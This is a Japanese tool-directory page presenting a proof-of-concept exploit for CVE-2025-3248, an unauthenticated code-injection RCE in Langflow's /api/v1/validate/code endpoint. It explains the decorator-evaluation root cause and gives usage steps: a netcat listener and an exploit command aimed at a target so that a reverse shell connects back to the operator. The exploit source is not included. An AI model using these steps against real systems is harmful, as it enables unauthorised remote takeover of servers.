Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3248-Langflow-RCE — CVE-2025-3248の概念実証エクスプロイト。Langflowにおける未認証のリモートコード実行脆弱性であり、/api/v1/validate/codeエンドポイントを介したコードインジェクションを実証します。 | Kitploit
ツール/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

CVE-2025-3248の概念実証エクスプロイト。Langflowにおける未認証のリモートコード実行脆弱性であり、/api/v1/validate/codeエンドポイントを介したコードインジェクションを実証します。

リポジトリを見る
21720日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-3248 — Langflow の未認証リモートコード実行

CVE-2025-3248 の概念実証エクスプロイトです。これは、AI/LLMワークフロー構築プラットフォームである Langflow における未認証のリモートコード実行の脆弱性です。

  • 影響を受けるバージョン: Langflow < 1.3.0
  • 修正バージョン: 1.3.0
  • 脆弱性クラス: 未認証RCE(CWE-94、コードインジェクション)
  • ステータス: ボットネットによる実環境での悪用が確認された後、CISAの既知の悪用された脆弱性カタログ に追加されました。

根本原因

Langflow は、UI から送信された Python コードのスニペット(例:カスタムコンポーネントコード)を「検証」するためのエンドポイント POST /api/v1/validate/code を公開しています。内部的には ast.parse() / compile() を使用してコードを解析・コンパイルし、有効かどうかを報告します — 認証は不要です。

バグの内容: Python は デコレータ式を解析・コンパイル時に評価 します。これは、デコレートされた関数が呼び出される前です。送信された「検証するコード」に次のようなデコレータが含まれている場合:

root@kitploit:~
@exec("...悪意のあるコード...")
def test():
    pass

exec(...) 呼び出しはコードが解析された瞬間に実行されます — 検証は実際に を呼び出す必要はありません。認証なしとサンドボックスなしが組み合わさることで、1つの未認証HTTPリクエストだけで Langflow を実行しているホスト上で任意のコマンドを実行できます。

test()

使用方法

  1. 自分のマシンでリスナーを起動します:
    root@kitploit:~
    nc -lvnp 9001
    
  2. ターゲットに対してPoCを実行します:
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. ターゲットに脆弱性がある場合、リスナー上でシェルを取得できます。
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

要件

root@kitploit:~
pip install requests

免責事項

このコードは教育目的および許可されたセキュリティテスト(ラボ、CTF、明示的な書面による許可を得たエンゲージメント)のみを目的として提供されています。所有していないシステム、またはテストする明示的な許可がないシステムに対してこれを実行しないでください。著者は誤用について責任を負いません。

参考情報

  • Langflow セキュリティアドバイザリ GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — Unsafe at Any Speed: Abusing Python Exec for Unauth RCE in Langflow AI
  • Keysight — CVE-2025-3248: Langflow Unauthenticated Code Validation
ツールをダウンロード